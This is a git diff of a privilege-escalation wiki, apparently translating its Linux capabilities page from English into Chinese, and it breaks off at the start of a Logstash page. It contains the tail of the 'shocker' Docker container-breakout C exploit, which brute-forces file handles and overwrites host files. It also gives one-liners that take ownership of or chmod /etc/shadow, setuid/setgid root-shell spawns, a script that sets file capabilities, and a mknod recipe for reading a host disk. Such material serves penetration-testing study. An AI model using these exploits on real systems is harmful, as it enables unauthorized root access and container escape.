ino, sizeof(ino)); - memcpy(outh.f_handle + 4, & i, sizeof(i)); - if ((i % (1 << 20)) == 0) - fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de -> d_name, i); - if (open_by_handle_at(bfd, (struct file_handle * ) & outh, 0) > 0) { - closedir(dir); - close(fd); - dump_handle( & outh); - return find_handle(bfd, path, & outh, oh); - } - } - } - closedir(dir); - close(fd); - return 0; +int fd; +uint32_t ino = 0; +struct my_file_handle outh = { +.handle_bytes = 8, +.handle_type = 1 +}; +DIR * dir = NULL; +struct dirent * de = NULL; +path = strchr(path, '/'); +// recursion stops if path has been resolved +if (!path) { +memcpy(oh -> f_handle, ih -> f_handle, sizeof(oh -> f_handle)); +oh -> handle_type = 1; +oh -> handle_bytes = 8; +return 1; +} +++path; +fprintf(stderr, "[*] Resolving '%s'\n", path); +if ((fd = open_by_handle_at(bfd, (struct file_handle * ) ih, O_RDONLY)) < 0) +die("[-] open_by_handle_at"); +if ((dir = fdopendir(fd)) == NULL) +die("[-] fdopendir"); +for (;;) { +de = readdir(dir); +if (!de) +break; +fprintf(stderr, "[*] Found %s\n", de -> d_name); +if (strncmp(de -> d_name, path, strlen(de -> d_name)) == 0) { +fprintf(stderr, "[+] Match: %s ino=%d\n", de -> d_name, (int) de -> d_ino); +ino = de -> d_ino; +break; +} +} +fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n"); +if (de) { +for (uint32_t i = 0; i < 0xffffffff; ++i) { +outh.handle_bytes = 8; +outh.handle_type = 1; +memcpy(outh.f_handle, & ino, sizeof(ino)); +memcpy(outh.f_handle + 4, & i, sizeof(i)); +if ((i % (1 << 20)) == 0) +fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de -> d_name, i); +if (open_by_handle_at(bfd, (struct file_handle * ) & outh, 0) > 0) { +closedir(dir); +close(fd); +dump_handle( & outh); +return find_handle(bfd, path, & outh, oh); +} +} +} +closedir(dir); +close(fd); +return 0; } int main(int argc, char * argv[]) { - char buf[0x1000]; - int fd1, fd2; - struct my_file_handle h; - struct my_file_handle root_h = { - .handle_bytes = 8, - .handle_type = 1, - .f_handle = { - 0x02, - 0, - 0, - 0, - 0, - 0, - 0, - 0 - } - }; - fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n" - "[***] The tea from the 90's kicks your sekurity again. [***]\n" - "[***] If you have pending sec consulting, I'll happily [***]\n" - "[***] forward to my friends who drink secury-tea too! [***]\n\n\n"); - read(0, buf, 1); - // get a FS reference from something mounted in from outside - if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0) - die("[-] open"); - if (find_handle(fd1, argv[1], & root_h, & h) <= 0) - die("[-] Cannot find valid handle!"); - fprintf(stderr, "[!] Got a final handle!\n"); - dump_handle( & h); - if ((fd2 = open_by_handle_at(fd1, (struct file_handle * ) & h, O_RDWR)) < 0) - die("[-] open_by_handle"); - char * line = NULL; - size_t len = 0; - FILE * fptr; - ssize_t read; - fptr = fopen(argv[2], "r"); - while ((read = getline( & line, & len, fptr)) != -1) { - write(fd2, line, read); - } - printf("Success!!\n"); - close(fd2); - close(fd1); - return 0; +char buf[0x1000]; +int fd1, fd2; +struct my_file_handle h; +struct my_file_handle root_h = { +.handle_bytes = 8, +.handle_type = 1, +.f_handle = { +0x02, +0, +0, +0, +0, +0, +0, +0 +} +}; +fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n" +"[***] The tea from the 90's kicks your sekurity again. [***]\n" +"[***] If you have pending sec consulting, I'll happily [***]\n" +"[***] forward to my friends who drink secury-tea too! [***]\n\n\n"); +read(0, buf, 1); +// get a FS reference from something mounted in from outside +if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0) +die("[-] open"); +if (find_handle(fd1, argv[1], & root_h, & h) <= 0) +die("[-] Cannot find valid handle!"); +fprintf(stderr, "[!] Got a final handle!\n"); +dump_handle( & h); +if ((fd2 = open_by_handle_at(fd1, (struct file_handle * ) & h, O_RDWR)) < 0) +die("[-] open_by_handle"); +char * line = NULL; +size_t len = 0; +FILE * fptr; +ssize_t read; +fptr = fopen(argv[2], "r"); +while ((read = getline( & line, & len, fptr)) != -1) { +write(fd2, line, read); +} +printf("Success!!\n"); +close(fd2); +close(fd1); +return 0; } ``` +为了逃离 docker 容器,你可以 **下载** 主机上的文件 `/etc/shadow` 和 `/etc/passwd`,**添加** 一个 **新用户**,并使用 **`shocker_write`** 来覆盖它们。然后,通过 **ssh** **访问**。 -In order to scape the docker container you could **download** the files `/etc/shadow` and `/etc/passwd` from the host, **add** to them a **new user**, and use **`shocker_write`** to overwrite them. Then, **access** via **ssh**. - -**The code of this technique was copied from the laboratory of "Abusing DAC_OVERRIDE Capability" from** [**https://www.pentesteracademy.com**](https://www.pentesteracademy.com) +**该技术的代码来自于“滥用 DAC_OVERRIDE 能力”的实验室** [**https://www.pentesteracademy.com**](https://www.pentesteracademy.com) ## CAP_CHOWN -**This means that it's possible to change the ownership of any file.** +**这意味着可以更改任何文件的所有权。** -**Example with binary** - -Lets suppose the **`python`** binary has this capability, you can **change** the **owner** of the **shadow** file, **change root password**, and escalate privileges: +**带有二进制文件的示例** +假设 **`python`** 二进制文件具有此能力,你可以 **更改** **shadow** 文件的 **所有者**,**更改 root 密码**,并提升权限: ```bash python -c 'import os;os.chown("/etc/shadow",1000,1000)' ``` - -Or with the **`ruby`** binary having this capability: - +或者 **`ruby`** 二进制文件具有此能力: ```bash ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")' ``` - ## CAP_FOWNER -**This means that it's possible to change the permission of any file.** +**这意味着可以更改任何文件的权限。** -**Example with binary** - -If python has this capability you can modify the permissions of the shadow file, **change root password**, and escalate privileges: +**带二进制的示例** +如果python具有此能力,您可以修改shadow文件的权限,**更改root密码**,并提升权限: ```bash python -c 'import os;os.chmod("/etc/shadow",0666) ``` - ### CAP_SETUID -**This means that it's possible to set the effective user id of the created process.** +**这意味着可以设置创建进程的有效用户 ID。** -**Example with binary** - -If python has this **capability**, you can very easily abuse it to escalate privileges to root: +**带二进制的示例** +如果 python 拥有这个 **capability**,你可以很容易地利用它来提升权限到 root: ```python import os os.setuid(0) os.system("/bin/bash") ``` - -**Another way:** - +**另一种方法:** ```python import os import prctl @@ -1291,17 +1160,15 @@ prctl.cap_effective.setuid = True os.setuid(0) os.system("/bin/bash") ``` - ## CAP_SETGID -**This means that it's possible to set the effective group id of the created process.** +**这意味着可以设置创建进程的有效组 ID。** -There are a lot of files you can **overwrite to escalate privileges,** [**you can get ideas from here**](payloads-to-execute.md#overwriting-a-file-to-escalate-privileges). +有很多文件可以**覆盖以提升权限,** [**你可以从这里获取灵感**](payloads-to-execute.md#overwriting-a-file-to-escalate-privileges)。 -**Example with binary** - -In this case you should look for interesting files that a group can read because you can impersonate any group: +**二进制示例** +在这种情况下,您应该寻找组可以读取的有趣文件,因为您可以冒充任何组: ```bash #Find every file writable by a group find / -perm /g=w -exec ls -lLd {} \; 2>/dev/null @@ -1310,31 +1177,25 @@ find /etc -maxdepth 1 -perm /g=w -exec ls -lLd {} \; 2>/dev/null #Find every file readable by a group in /etc with a maxpath of 1 find /etc -maxdepth 1 -perm /g=r -exec ls -lLd {} \; 2>/dev/null ``` - -Once you have find a file you can abuse (via reading or writing) to escalate privileges you can **get a shell impersonating the interesting group** with: - +一旦你找到一个可以滥用的文件(通过读取或写入)以提升权限,你可以通过以下方式**获取一个模拟有趣组的 shell**: ```python import os os.setgid(42) os.system("/bin/bash") ``` - -In this case the group shadow was impersonated so you can read the file `/etc/shadow`: - +在这种情况下,组 shadow 被冒充,因此您可以读取文件 `/etc/shadow`: ```bash cat /etc/shadow ``` - -If **docker** is installed you could **impersonate** the **docker group** and abuse it to communicate with the [**docker socket** and escalate privileges](./#writable-docker-socket). +如果 **docker** 已安装,您可以 **冒充** **docker 组** 并利用它与 [**docker socket** 进行通信并提升权限](./#writable-docker-socket)。 ## CAP_SETFCAP -**This means that it's possible to set capabilities on files and processes** +**这意味着可以在文件和进程上设置能力** -**Example with binary** - -If python has this **capability**, you can very easily abuse it to escalate privileges to root: +**带有二进制文件的示例** +如果 python 拥有此 **能力**,您可以非常轻松地利用它提升权限到 root: ```python:setcapability.py import ctypes, sys @@ -1355,22 +1216,20 @@ cap_t = libcap.cap_from_text(cap) status = libcap.cap_set_file(path,cap_t) if(status == 0): - print (cap + " was successfully added to " + path) +print (cap + " was successfully added to " + path) ``` ```bash python setcapability.py /usr/bin/python2.7 ``` - > [!WARNING] -> Note that if you set a new capability to the binary with CAP_SETFCAP, you will lose this cap. +> 注意,如果您使用 CAP_SETFCAP 为二进制文件设置了新的能力,您将失去此能力。 -Once you have [SETUID capability](linux-capabilities.md#cap_setuid) you can go to its section to see how to escalate privileges. +一旦您拥有 [SETUID capability](linux-capabilities.md#cap_setuid),您可以查看其部分以了解如何提升权限。 -**Example with environment (Docker breakout)** - -By default the capability **CAP_SETFCAP is given to the proccess inside the container in Docker**. You can check that doing something like: +**环境示例(Docker 突破)** +默认情况下,能力 **CAP_SETFCAP 被赋予 Docker 容器内的进程**。您可以通过执行以下操作来检查: ```bash cat /proc/`pidof bash`/status | grep Cap CapInh: 00000000a80425fb @@ -1382,10 +1241,8 @@ CapAmb: 0000000000000000 capsh --decode=00000000a80425fb 0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap ``` - -This capability allow to **give any other capability to binaries**, so we could think about **escaping** from the container **abusing any of the other capability breakouts** mentioned in this page.\ -However, if you try to give for example the capabilities CAP_SYS_ADMIN and CAP_SYS_PTRACE to the gdb binary, you will find that you can give them, but the **binary won’t be able to execute after this**: - +这个能力允许**将任何其他能力赋予二进制文件**,因此我们可以考虑**利用此页面提到的其他能力突破**来**逃逸**容器。\ +然而,如果你尝试将能力 CAP_SYS_ADMIN 和 CAP_SYS_PTRACE 赋予 gdb 二进制文件,你会发现你可以赋予它们,但**二进制文件在此之后将无法执行**: ```bash getcap /usr/bin/gdb /usr/bin/gdb = cap_sys_ptrace,cap_sys_admin+eip @@ -1395,27 +1252,25 @@ setcap cap_sys_admin,cap_sys_ptrace+eip /usr/bin/gdb /usr/bin/gdb bash: /usr/bin/gdb: Operation not permitted ``` - -[From the docs](https://man7.org/linux/man-pages/man7/capabilities.7.html): _Permitted: This is a **limiting superset for the effective capabilities** that the thread may assume. It is also a limiting superset for the capabilities that may be added to the inheri‐table set by a thread that **does not have the CAP_SETPCAP** capability in its effective set._\ -It looks like the Permitted capabilities limit the ones that can be used.\ -However, Docker also grants the **CAP_SETPCAP** by default, so you might be able to **set new capabilities inside the inheritables ones**.\ -However, in the documentation of this cap: _CAP_SETPCAP : \[…] **add any capability from the calling thread’s bounding** set to its inheritable set_.\ -It looks like we can only add to the inheritable set capabilities from the bounding set. Which means that **we cannot put new capabilities like CAP_SYS_ADMIN or CAP_SYS_PTRACE in the inherit set to escalate privileges**. +[From the docs](https://man7.org/linux/man-pages/man7/capabilities.7.html): _Permitted: 这是一个**有效能力的限制超集**,线程可以假定它。它也是一个限制超集,线程可以将其**有效集**中没有CAP_SETPCAP能力的能力添加到可继承集。_\ +看起来Permitted能力限制了可以使用的能力。\ +然而,Docker默认也授予**CAP_SETPCAP**,因此您可能能够**在可继承的能力中设置新能力**。\ +然而,在此能力的文档中:_CAP_SETPCAP : \[…] **将调用线程的边界**集中的任何能力添加到其可继承集。_\ +看起来我们只能将边界集中的能力添加到可继承集。这意味着**我们不能将新能力如CAP_SYS_ADMIN或CAP_SYS_PTRACE放入继承集中以提升权限**。 ## CAP_SYS_RAWIO -[**CAP_SYS_RAWIO**](https://man7.org/linux/man-pages/man7/capabilities.7.html) provides a number of sensitive operations including access to `/dev/mem`, `/dev/kmem` or `/proc/kcore`, modify `mmap_min_addr`, access `ioperm(2)` and `iopl(2)` system calls, and various disk commands. The `FIBMAP ioctl(2)` is also enabled via this capability, which has caused issues in the [past](http://lkml.iu.edu/hypermail/linux/kernel/9907.0/0132.html). As per the man page, this also allows the holder to descriptively `perform a range of device-specific operations on other devices`. +[**CAP_SYS_RAWIO**](https://man7.org/linux/man-pages/man7/capabilities.7.html) 提供了一些敏感操作,包括访问`/dev/mem`、`/dev/kmem`或`/proc/kcore`,修改`mmap_min_addr`,访问`ioperm(2)`和`iopl(2)`系统调用,以及各种磁盘命令。`FIBMAP ioctl(2)`也通过此能力启用,这在[过去](http://lkml.iu.edu/hypermail/linux/kernel/9907.0/0132.html)造成了一些问题。根据手册页,这也允许持有者描述性地`对其他设备执行一系列特定于设备的操作`。 -This can be useful for **privilege escalation** and **Docker breakout.** +这对于**权限提升**和**Docker突破**非常有用。 ## CAP_KILL -**This means that it's possible to kill any process.** +**这意味着可以终止任何进程。** -**Example with binary** - -Lets suppose the **`python`** binary has this capability. If you could **also modify some service or socket configuration** (or any configuration file related to a service) file, you could backdoor it, and then kill the process related to that service and wait for the new configuration file to be executed with your backdoor. +**带有二进制文件的示例** +假设**`python`**二进制文件具有此能力。如果您还可以**修改某些服务或套接字配置**(或与服务相关的任何配置文件)文件,您可以对其进行后门处理,然后终止与该服务相关的进程,并等待新的配置文件与您的后门一起执行。 ```python #Use this python code to kill arbitrary processes import os @@ -1423,39 +1278,27 @@ import signal pgid = os.getpgid(341) os.killpg(pgid, signal.SIGKILL) ``` +**使用 kill 提权** -**Privesc with kill** - -If you have kill capabilities and there is a **node program running as root** (or as a different user)you could probably **send** it the **signal SIGUSR1** and make it **open the node debugger** to where you can connect. - +如果你拥有 kill 权限,并且有一个 **以 root 身份运行的 node 程序**(或以其他用户身份运行),你可以 **发送** 给它 **信号 SIGUSR1**,使其 **打开 node 调试器**,以便你可以连接。 ```bash kill -s SIGUSR1 # After an URL to access the debugger will appear. e.g. ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d ``` - {{#ref}} electron-cef-chromium-debugger-abuse.md {{#endref}} -​ - -
- -​​​​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - ## CAP_NET_BIND_SERVICE -**This means that it's possible to listen in any port (even in privileged ones).** You cannot escalate privileges directly with this capability. +**这意味着可以在任何端口上监听(甚至是特权端口)。** 你不能直接通过这个能力提升特权。 -**Example with binary** +**带二进制的示例** -If **`python`** has this capability it will be able to listen on any port and even connect from it to any other port (some services require connections from specific privileges ports) +如果 **`python`** 拥有这个能力,它将能够在任何端口上监听,甚至可以从它连接到任何其他端口(某些服务需要从特定特权端口进行连接) {{#tabs}} {{#tab name="Listen"}} - ```python import socket s=socket.socket() @@ -1463,45 +1306,39 @@ s.bind(('0.0.0.0', 80)) s.listen(1) conn, addr = s.accept() while True: - output = connection.recv(1024).strip(); - print(output) +output = connection.recv(1024).strip(); +print(output) ``` - {{#endtab}} {{#tab name="Connect"}} - ```python import socket s=socket.socket() s.bind(('0.0.0.0',500)) s.connect(('10.10.10.10',500)) ``` - {{#endtab}} {{#endtabs}} ## CAP_NET_RAW -[**CAP_NET_RAW**](https://man7.org/linux/man-pages/man7/capabilities.7.html) capability permits processes to **create RAW and PACKET sockets**, enabling them to generate and send arbitrary network packets. This can lead to security risks in containerized environments, such as packet spoofing, traffic injection, and bypassing network access controls. Malicious actors could exploit this to interfere with container routing or compromise host network security, especially without adequate firewall protections. Additionally, **CAP_NET_RAW** is crucial for privileged containers to support operations like ping via RAW ICMP requests. +[**CAP_NET_RAW**](https://man7.org/linux/man-pages/man7/capabilities.7.html) 能力允许进程 **创建 RAW 和 PACKET 套接字**,使它们能够生成和发送任意网络数据包。这可能导致容器化环境中的安全风险,例如数据包欺骗、流量注入和绕过网络访问控制。恶意行为者可能利用这一点干扰容器路由或危害主机网络安全,尤其是在没有足够防火墙保护的情况下。此外,**CAP_NET_RAW** 对于特权容器支持通过 RAW ICMP 请求进行的操作(如 ping)至关重要。 -**This means that it's possible to sniff traffic.** You cannot escalate privileges directly with this capability. +**这意味着可以嗅探流量。** 你不能直接通过这个能力提升权限。 -**Example with binary** - -If the binary **`tcpdump`** has this capability you will be able to use it to capture network information. +**带二进制的示例** +如果二进制文件 **`tcpdump`** 拥有此能力,你将能够使用它捕获网络信息。 ```bash getcap -r / 2>/dev/null /usr/sbin/tcpdump = cap_net_raw+ep ``` +注意,如果**环境**提供了这个能力,你也可以使用**`tcpdump`**来嗅探流量。 -Note that if the **environment** is giving this capability you could also use **`tcpdump`** to sniff traffic. - -**Example with binary 2** - -The following example is **`python2`** code that can be useful to intercept traffic of the "**lo**" (**localhost**) interface. The code is from the lab "_The Basics: CAP-NET_BIND + NET_RAW_" from [https://attackdefense.pentesteracademy.com/](https://attackdefense.pentesteracademy.com) +**二进制示例 2** +以下示例是**`python2`**代码,可以用于拦截"**lo**"(**localhost**)接口的流量。该代码来自实验"_基础知识:CAP-NET_BIND + NET_RAW_",来源于[https://attackdefense.pentesteracademy.com/](https://attackdefense.pentesteracademy.com) ```python import socket import struct @@ -1509,11 +1346,11 @@ import struct flags=["NS","CWR","ECE","URG","ACK","PSH","RST","SYN","FIN"] def getFlag(flag_value): - flag="" - for i in xrange(8,-1,-1): - if( flag_value & 1 < [!NOTE] -> Note that usually this immutable attribute is set and remove using: +> 请注意,通常这个不可变属性是通过以下命令设置和移除的: > > ```bash > sudo chattr +i file.txt @@ -1607,47 +1439,46 @@ f.write('New content for the file\n') ## CAP_SYS_CHROOT -[**CAP_SYS_CHROOT**](https://man7.org/linux/man-pages/man7/capabilities.7.html) enables the execution of the `chroot(2)` system call, which can potentially allow for the escape from `chroot(2)` environments through known vulnerabilities: +[**CAP_SYS_CHROOT**](https://man7.org/linux/man-pages/man7/capabilities.7.html) 使得可以执行 `chroot(2)` 系统调用,这可能通过已知漏洞允许从 `chroot(2)` 环境中逃逸: -- [How to break out from various chroot solutions](https://deepsec.net/docs/Slides/2015/Chw00t_How_To_Break%20Out_from_Various_Chroot_Solutions_-_Bucsay_Balazs.pdf) -- [chw00t: chroot escape tool](https://github.com/earthquake/chw00t/) +- [如何从各种 chroot 解决方案中突破](https://deepsec.net/docs/Slides/2015/Chw00t_How_To_Break%20Out_from_Various_Chroot_Solutions_-_Bucsay_Balazs.pdf) +- [chw00t: chroot 逃逸工具](https://github.com/earthquake/chw00t/) ## CAP_SYS_BOOT -[**CAP_SYS_BOOT**](https://man7.org/linux/man-pages/man7/capabilities.7.html) not only allows the execution of the `reboot(2)` system call for system restarts, including specific commands like `LINUX_REBOOT_CMD_RESTART2` tailored for certain hardware platforms, but it also enables the use of `kexec_load(2)` and, from Linux 3.17 onwards, `kexec_file_load(2)` for loading new or signed crash kernels respectively. +[**CAP_SYS_BOOT**](https://man7.org/linux/man-pages/man7/capabilities.7.html) 不仅允许执行 `reboot(2)` 系统调用以重启系统,包括针对特定硬件平台的特定命令如 `LINUX_REBOOT_CMD_RESTART2`,还允许使用 `kexec_load(2)`,并且从 Linux 3.17 开始,允许使用 `kexec_file_load(2)` 来加载新的或签名的崩溃内核。 ## CAP_SYSLOG -[**CAP_SYSLOG**](https://man7.org/linux/man-pages/man7/capabilities.7.html) was separated from the broader **CAP_SYS_ADMIN** in Linux 2.6.37, specifically granting the ability to use the `syslog(2)` call. This capability enables the viewing of kernel addresses via `/proc` and similar interfaces when the `kptr_restrict` setting is at 1, which controls the exposure of kernel addresses. Since Linux 2.6.39, the default for `kptr_restrict` is 0, meaning kernel addresses are exposed, though many distributions set this to 1 (hide addresses except from uid 0) or 2 (always hide addresses) for security reasons. +[**CAP_SYSLOG**](https://man7.org/linux/man-pages/man7/capabilities.7.html) 在 Linux 2.6.37 中从更广泛的 **CAP_SYS_ADMIN** 中分离,专门授予使用 `syslog(2)` 调用的能力。此能力使得在 `kptr_restrict` 设置为 1 时,可以通过 `/proc` 和类似接口查看内核地址,该设置控制内核地址的暴露。自 Linux 2.6.39 起,`kptr_restrict` 的默认值为 0,这意味着内核地址被暴露,尽管许多发行版出于安全原因将其设置为 1(隐藏地址,除非来自 uid 0)或 2(始终隐藏地址)。 -Additionally, **CAP_SYSLOG** allows accessing `dmesg` output when `dmesg_restrict` is set to 1. Despite these changes, **CAP_SYS_ADMIN** retains the ability to perform `syslog` operations due to historical precedents. +此外,**CAP_SYSLOG** 允许在 `dmesg_restrict` 设置为 1 时访问 `dmesg` 输出。尽管这些变化,**CAP_SYS_ADMIN** 仍然保留执行 `syslog` 操作的能力,因其历史原因。 ## CAP_MKNOD -[**CAP_MKNOD**](https://man7.org/linux/man-pages/man7/capabilities.7.html) extends the functionality of the `mknod` system call beyond creating regular files, FIFOs (named pipes), or UNIX domain sockets. It specifically allows for the creation of special files, which include: +[**CAP_MKNOD**](https://man7.org/linux/man-pages/man7/capabilities.7.html) 扩展了 `mknod` 系统调用的功能,不仅限于创建常规文件、FIFO(命名管道)或 UNIX 域套接字。它特别允许创建特殊文件,包括: -- **S_IFCHR**: Character special files, which are devices like terminals. -- **S_IFBLK**: Block special files, which are devices like disks. +- **S_IFCHR**:字符特殊文件,例如终端设备。 +- **S_IFBLK**:块特殊文件,例如磁盘设备。 -This capability is essential for processes that require the ability to create device files, facilitating direct hardware interaction through character or block devices. +此能力对于需要创建设备文件的进程至关重要,便于通过字符或块设备直接与硬件交互。 -It is a default docker capability ([https://github.com/moby/moby/blob/master/oci/caps/defaults.go#L6-L19](https://github.com/moby/moby/blob/master/oci/caps/defaults.go#L6-L19)). +这是一个默认的 docker 能力 ([https://github.com/moby/moby/blob/master/oci/caps/defaults.go#L6-L19](https://github.com/moby/moby/blob/master/oci/caps/defaults.go#L6-L19))。 -This capability permits to do privilege escalations (through full disk read) on the host, under these conditions: +此能力允许在主机上进行特权提升(通过完全磁盘读取),在以下条件下: -1. Have initial access to the host (Unprivileged). -2. Have initial access to the container (Privileged (EUID 0), and effective `CAP_MKNOD`). -3. Host and container should share the same user namespace. +1. 拥有对主机的初始访问(无特权)。 +2. 拥有对容器的初始访问(特权(EUID 0),并有效 `CAP_MKNOD`)。 +3. 主机和容器应共享相同的用户命名空间。 -**Steps to Create and Access a Block Device in a Container:** +**在容器中创建和访问块设备的步骤:** -1. **On the Host as a Standard User:** +1. **在主机上作为标准用户:** - - Determine your current user ID with `id`, e.g., `uid=1000(standarduser)`. - - Identify the target device, for example, `/dev/sdb`. - -2. **Inside the Container as `root`:** +- 使用 `id` 确定当前用户 ID,例如 `uid=1000(standarduser)`。 +- 确定目标设备,例如 `/dev/sdb`。 +2. **在容器内作为 `root`:** ```bash # Create a block special file for the host device mknod /dev/sdb b 8 16 @@ -1658,9 +1489,7 @@ useradd -u 1000 standarduser # Switch to the newly created user su standarduser ``` - -3. **Back on the Host:** - +3. **回到主机:** ```bash # Locate the PID of the container process owned by "standarduser" # This is an illustrative example; actual command might vary @@ -1669,28 +1498,27 @@ ps aux | grep -i container_name | grep -i standarduser # Access the container's filesystem and the special block device head /proc/12345/root/dev/sdb ``` - -This approach allows the standard user to access and potentially read data from `/dev/sdb` through the container, exploiting shared user namespaces and permissions set on the device. +这种方法允许标准用户通过容器访问并可能读取来自 `/dev/sdb` 的数据,利用共享的用户命名空间和设备上设置的权限。 ### CAP_SETPCAP -**CAP_SETPCAP** enables a process to **alter the capability sets** of another process, allowing for the addition or removal of capabilities from the effective, inheritable, and permitted sets. However, a process can only modify capabilities that it possesses in its own permitted set, ensuring it cannot elevate another process's privileges beyond its own. Recent kernel updates have tightened these rules, restricting `CAP_SETPCAP` to only diminish the capabilities within its own or its descendants' permitted sets, aiming to mitigate security risks. Usage requires having `CAP_SETPCAP` in the effective set and the target capabilities in the permitted set, utilizing `capset()` for modifications. This summarizes the core function and limitations of `CAP_SETPCAP`, highlighting its role in privilege management and security enhancement. +**CAP_SETPCAP** 使进程能够 **更改另一个进程的能力集**,允许从有效、可继承和允许的集合中添加或删除能力。然而,进程只能修改其在自己允许集合中拥有的能力,确保它无法将另一个进程的权限提升到超出其自身的权限。最近的内核更新收紧了这些规则,限制 `CAP_SETPCAP` 只能减少其自身或其后代的允许集合中的能力,旨在降低安全风险。使用此功能需要在有效集合中拥有 `CAP_SETPCAP`,并在允许集合中拥有目标能力,利用 `capset()` 进行修改。这总结了 `CAP_SETPCAP` 的核心功能和限制,突出了其在权限管理和安全增强中的作用。 -**`CAP_SETPCAP`** is a Linux capability that allows a process to **modify the capability sets of another process**. It grants the ability to add or remove capabilities from the effective, inheritable, and permitted capability sets of other processes. However, there are certain restrictions on how this capability can be used. +**`CAP_SETPCAP`** 是一个 Linux 能力,允许进程 **修改另一个进程的能力集**。它授予从其他进程的有效、可继承和允许能力集中添加或删除能力的能力。然而,使用此能力有某些限制。 -A process with `CAP_SETPCAP` **can only grant or remove capabilities that are in its own permitted capability set**. In other words, a process cannot grant a capability to another process if it does not have that capability itself. This restriction prevents a process from elevating the privileges of another process beyond its own level of privilege. +拥有 `CAP_SETPCAP` 的进程 **只能授予或移除其自身允许能力集中存在的能力**。换句话说,如果一个进程自己没有某个能力,它就不能将该能力授予另一个进程。这一限制防止了进程将另一个进程的权限提升到超出其自身的权限级别。 -Moreover, in recent kernel versions, the `CAP_SETPCAP` capability has been **further restricted**. It no longer allows a process to arbitrarily modify the capability sets of other processes. Instead, it **only allows a process to lower the capabilities in its own permitted capability set or the permitted capability set of its descendants**. This change was introduced to reduce potential security risks associated with the capability. +此外,在最近的内核版本中,`CAP_SETPCAP` 能力已被 **进一步限制**。它不再允许进程任意修改其他进程的能力集。相反,它 **仅允许进程降低其自身允许能力集或其后代的允许能力集中的能力**。这一变化是为了减少与能力相关的潜在安全风险。 -To use `CAP_SETPCAP` effectively, you need to have the capability in your effective capability set and the target capabilities in your permitted capability set. You can then use the `capset()` system call to modify the capability sets of other processes. +要有效使用 `CAP_SETPCAP`,您需要在有效能力集中拥有该能力,并在允许能力集中拥有目标能力。然后,您可以使用 `capset()` 系统调用来修改其他进程的能力集。 -In summary, `CAP_SETPCAP` allows a process to modify the capability sets of other processes, but it cannot grant capabilities that it doesn't have itself. Additionally, due to security concerns, its functionality has been limited in recent kernel versions to only allow reducing capabilities in its own permitted capability set or the permitted capability sets of its descendants. +总之,`CAP_SETPCAP` 允许进程修改其他进程的能力集,但不能授予它自己没有的能力。此外,由于安全问题,其功能在最近的内核版本中已被限制,仅允许减少其自身允许能力集或其后代的允许能力集中的能力。 -## References +## 参考文献 -**Most of these examples were taken from some labs of** [**https://attackdefense.pentesteracademy.com/**](https://attackdefense.pentesteracademy.com), so if you want to practice this privesc techniques I recommend these labs. +**这些示例大多来自** [**https://attackdefense.pentesteracademy.com/**](https://attackdefense.pentesteracademy.com),因此如果您想练习这些权限提升技术,我推荐这些实验室。 -**Other references**: +**其他参考文献**: - [https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux](https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux) - [https://www.schutzwerk.com/en/43/posts/linux_container_capabilities/#:\~:text=Inherited%20capabilities%3A%20A%20process%20can,a%20binary%2C%20e.g.%20using%20setcap%20.](https://www.schutzwerk.com/en/43/posts/linux_container_capabilities/) @@ -1700,10 +1528,4 @@ In summary, `CAP_SETPCAP` allows a process to modify the capability sets of othe - [https://labs.withsecure.com/publications/abusing-the-access-to-mount-namespaces-through-procpidroot](https://labs.withsecure.com/publications/abusing-the-access-to-mount-namespaces-through-procpidroot) ​ - -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} {{#include ../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/logstash.md b/src/linux-hardening/privilege-escalation/logstash.md index fe091391a..6a9a1f048 100644 --- a/src/linux-hardening/privilege-escalation/logstash.md +++ b/src/linux-hardening/privilege-escalation/logstash.md @@ -2,59 +2,55 @@ ## Logstash -Logstash is used to **gather, transform, and dispatch logs** through a system known as **pipelines**. These pipelines are made up of **input**, **filter**, and **output** stages. An interesting aspect arises when Logstash operates on a compromised machine. +Logstash 用于 **收集、转换和分发日志** 通过一个称为 **管道** 的系统。这些管道由 **输入**、**过滤** 和 **输出** 阶段组成。当 Logstash 在被攻陷的机器上运行时,会出现一个有趣的方面。 ### Pipeline Configuration -Pipelines are configured in the file **/etc/logstash/pipelines.yml**, which lists the locations of the pipeline configurations: - +管道在文件 **/etc/logstash/pipelines.yml** 中配置,该文件列出了管道配置的位置: ```yaml # Define your pipelines here. Multiple pipelines can be defined. # For details on multiple pipelines, refer to the documentation: # https://www.elastic.co/guide/en/logstash/current/multiple-pipelines.html - pipeline.id: main - path.config: "/etc/logstash/conf.d/*.conf" +path.config: "/etc/logstash/conf.d/*.conf" - pipeline.id: example - path.config: "/usr/share/logstash/pipeline/1*.conf" - pipeline.workers: 6 +path.config: "/usr/share/logstash/pipeline/1*.conf" +pipeline.workers: 6 ``` +该文件揭示了包含管道配置的 **.conf** 文件的位置。当使用 **Elasticsearch output module** 时,**pipelines** 通常包含 **Elasticsearch credentials**,这些凭据由于 Logstash 需要将数据写入 Elasticsearch,通常具有广泛的权限。配置路径中的通配符允许 Logstash 执行指定目录中所有匹配的管道。 -This file reveals where the **.conf** files, containing pipeline configurations, are located. When employing an **Elasticsearch output module**, it's common for **pipelines** to include **Elasticsearch credentials**, which often possess extensive privileges due to Logstash's need to write data to Elasticsearch. 